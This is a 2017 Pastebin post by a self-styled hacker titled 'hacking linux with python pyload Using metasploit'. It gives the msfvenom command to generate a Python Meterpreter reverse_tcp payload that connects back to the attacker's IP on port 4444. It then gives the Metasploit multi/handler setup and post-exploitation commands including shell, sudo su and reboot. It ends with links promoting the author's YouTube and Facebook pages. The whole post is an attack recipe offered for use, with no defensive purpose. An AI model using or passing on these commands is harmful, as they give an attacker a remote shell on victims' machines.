Professional-hacker

hacking linux with python pyload Using metasploit

Jan 30th, 2017
337
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.19 KB | None | 0 0
  1. ##################################################JokerSecurity###############################################################
  2. # Title : hacking linux with python pyload Using metasploit
  3. # Tested On : [ Kali-Linux ]
  4. # MyChannel Youtube : https://www.youtube.com/channel/UCPRRAzu8dMWxChn-RruC-eg/videos
  5. # Myblog : http://kader-information.blogspot.com/
  6. # Link video :https://www.youtube.com/watch?v=rLFaHX8q5m0
  7. ######################
  8. # [+] COMMENDS :
  9. ######################
  10. create pyalod
  11. ============
  12. msfvenom -p python/meterpreter/reverse_tcp LHOST=(your-ip) LPORT=4444 R > /root/Desktop/jok.py
  13.  
  14. metasploit commends :
  15. ====================
  16. use exploit/multi/handler
  17. set payload python/meterpreter/reverse_tcp
  18. set LHOST (your-ip)
  19. set LPORT 4444
  20. exploit
  21. help
  22. sysinfo
  23. shell
  24. sudo su
  25. ls
  26. ifconfig
  27. reboot
  28.  
  29.  
  30. subscribe for my channel and page in facebook
  31.  
  32. # My Blogger : http://kader-information.blogspot.com/
  33.  
  34. # Page FacebOOk1 : https://www.facebook.com/AnonymousPalestine.vip
  35.  
  36. # Page Facebook2 : https://www.facebook.com/Professional.hacker.25/
  37.  
  38. By <3
  39.  
  40. ##################################################JokerSecurity###############################################################
Add Comment
Please, Sign In to add comment